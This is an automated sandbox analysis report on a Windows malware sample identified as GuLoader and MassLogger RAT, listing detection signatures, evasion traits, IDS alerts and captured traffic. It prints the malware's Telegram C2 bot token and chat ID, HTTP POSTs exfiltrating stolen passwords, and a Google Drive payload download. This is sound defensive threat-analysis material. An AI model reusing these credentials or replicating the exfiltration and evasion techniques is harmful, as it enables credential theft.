Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ajRZflJ2ch.exe

Overview

General Information

Sample name:ajRZflJ2ch.exe
renamed because original name is a hash value
Original sample name:1d703dda4c786c51432a22da942b92244544a00c1d81b937bd5e5424947804f8.exe
Analysis ID:1588086
MD5:c9775580271050109b3431a54f1880f0
SHA1:85d69a1abf2b6c4ab9a4fa77c27c5f43e7302630
SHA256:1d703dda4c786c51432a22da942b92244544a00c1d81b937bd5e5424947804f8
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ajRZflJ2ch.exe (PID: 2940 cmdline: "C:\Users\user\Desktop\ajRZflJ2ch.exe" MD5: C9775580271050109B3431A54F1880F0)
    • ajRZflJ2ch.exe (PID: 5060 cmdline: "C:\Users\user\Desktop\ajRZflJ2ch.exe" MD5: C9775580271050109B3431A54F1880F0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2233521222.00000000059F7000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: ajRZflJ2ch.exe PID: 5060JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:17:10.874170+010020577441Malware Command and Control Activity Detected192.168.2.849877149.154.167.220443TCP
            2025-01-10T21:17:12.691079+010020577441Malware Command and Control Activity Detected192.168.2.849893149.154.167.220443TCP
            2025-01-10T21:17:14.330984+010020577441Malware Command and Control Activity Detected192.168.2.849906149.154.167.220443TCP
            2025-01-10T21:17:15.992211+010020577441Malware Command and Control Activity Detected192.168.2.849918149.154.167.220443TCP
            2025-01-10T21:17:17.899459+010020577441Malware Command and Control Activity Detected192.168.2.849930149.154.167.220443TCP
            2025-01-10T21:17:19.567198+010020577441Malware Command and Control Activity Detected192.168.2.849946149.154.167.220443TCP
            2025-01-10T21:17:21.272538+010020577441Malware Command and Control Activity Detected192.168.2.849958149.154.167.220443TCP
            2025-01-10T21:17:22.988453+010020577441Malware Command and Control Activity Detected192.168.2.849971149.154.167.220443TCP
            2025-01-10T21:17:24.707595+010020577441Malware Command and Control Activity Detected192.168.2.849983149.154.167.220443TCP
            2025-01-10T21:17:26.409909+010020577441Malware Command and Control Activity Detected192.168.2.849996149.154.167.220443TCP
            2025-01-10T21:17:30.991256+010020577441Malware Command and Control Activity Detected192.168.2.849998149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:17:01.773424+010028032742Potentially Bad Traffic192.168.2.849827193.122.6.16880TCP
            2025-01-10T21:17:09.914055+010028032742Potentially Bad Traffic192.168.2.849827193.122.6.16880TCP
            2025-01-10T21:17:11.789066+010028032742Potentially Bad Traffic192.168.2.849888132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:16:56.799124+010028032702Potentially Bad Traffic192.168.2.849795142.250.184.206443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:17:10.539561+010018100081Potentially Bad Traffic192.168.2.849877149.154.167.220443TCP
            2025-01-10T21:17:12.347630+010018100081Potentially Bad Traffic192.168.2.849893149.154.167.220443TCP
            2025-01-10T21:17:14.000023+010018100081Potentially Bad Traffic192.168.2.849906149.154.167.220443TCP
            2025-01-10T21:17:15.637564+010018100081Potentially Bad Traffic192.168.2.849918149.154.167.220443TCP
            2025-01-10T21:17:17.310980+010018100081Potentially Bad Traffic192.168.2.849930149.154.167.220443TCP
            2025-01-10T21:17:19.197370+010018100081Potentially Bad Traffic192.168.2.849946149.154.167.220443TCP
            2025-01-10T21:17:20.887708+010018100081Potentially Bad Traffic192.168.2.849958149.154.167.220443TCP
            2025-01-10T21:17:22.602991+010018100081Potentially Bad Traffic192.168.2.849971149.154.167.220443TCP
            2025-01-10T21:17:24.335626+010018100081Potentially Bad Traffic192.168.2.849983149.154.167.220443TCP
            2025-01-10T21:17:26.018875+010018100081Potentially Bad Traffic192.168.2.849996149.154.167.220443TCP
            2025-01-10T21:17:30.627335+010018100081Potentially Bad Traffic192.168.2.849998149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: ajRZflJ2ch.exeAvira: detected
            Source: 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: ajRZflJ2ch.exe.5060.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: ajRZflJ2ch.exeVirustotal: Detection: 74%Perma Link
            Source: ajRZflJ2ch.exeReversingLabs: Detection: 60%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFD1EC CryptUnprotectData,5_2_36AFD1EC
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFD9D9 CryptUnprotectData,5_2_36AFD9D9
            Source: ajRZflJ2ch.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49843 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.8:49795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49877 version: TLS 1.2
            Source: ajRZflJ2ch.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_0040672B FindFirstFileW,FindClose,5_2_0040672B
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405AFA
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AFC985h5_2_36AFC638
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AF1042h5_2_36AF0C28
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AF0671h5_2_36AF03AF
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AFE198h5_2_36AFDEE1
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AFEA48h5_2_36AFE790
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AF1042h5_2_36AF0F6F
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AFB791h5_2_36AFB4EC
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AF1042h5_2_36AF0C1B
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AFC041h5_2_36AFBD9C
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AFDD40h5_2_36AFDA89
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AFEEA0h5_2_36AFEBF4
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AFE5F0h5_2_36AFE339
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AFB339h5_2_36AFB07F
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AFF2F8h5_2_36AFF054
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AFC499h5_2_36AFC1F2
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 36AFBBE9h5_2_36AFB930
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then push 00000000h5_2_39A8BDF0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A8882Dh5_2_39A88650
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A891B7h5_2_39A88650
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A82C60h5_2_39A829B8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A823B0h5_2_39A82108
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A84ACAh5_2_39A84820
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A87318h5_2_39A87070
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A81B00h5_2_39A81858
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A84670h5_2_39A843C8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A83DC0h5_2_39A83B18
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A86610h5_2_39A86368
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_39A87B4F
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A85D60h5_2_39A85AB8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A854B0h5_2_39A85208
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A83510h5_2_39A83268
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A85058h5_2_39A84DB0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A82808h5_2_39A82560
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A81F58h5_2_39A81CB0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A87770h5_2_39A874C8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A816A8h5_2_39A81400
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A86EC0h5_2_39A86C18
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A81250h5_2_39A80FA8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A86A68h5_2_39A867C0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A861B8h5_2_39A85F10
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A84218h5_2_39A83F70
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A83968h5_2_39A836C0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A830B8h5_2_39A82E10
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then jmp 39A85908h5_2_39A85660
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then push 00000000h5_2_39EBE7C8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then push 00000000h5_2_39EBF316
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]5_2_39EBF5D8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49906 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49958 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49930 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49958 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49906 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49930 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49918 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49918 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49893 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49893 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49983 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49983 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49971 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49877 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49877 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49971 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49946 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49946 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3189d99afcd2Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a02bcc4d72Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31b5093108a8Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31c9d79a2386Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31de974860eeHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f60959947bHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd320c0911f197Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32209989e033Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32351af635cdHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32498ceb8d8bHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3189e59bd272Host: api.telegram.orgContent-Length: 1090
            Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49888 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49827 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49795 -> 142.250.184.206:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17zh6-Wlf0aT1vS8RBy4ZmVv4fH0VS4Vd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=17zh6-Wlf0aT1vS8RBy4ZmVv4fH0VS4Vd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49843 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17zh6-Wlf0aT1vS8RBy4ZmVv4fH0VS4Vd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=17zh6-Wlf0aT1vS8RBy4ZmVv4fH0VS4Vd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
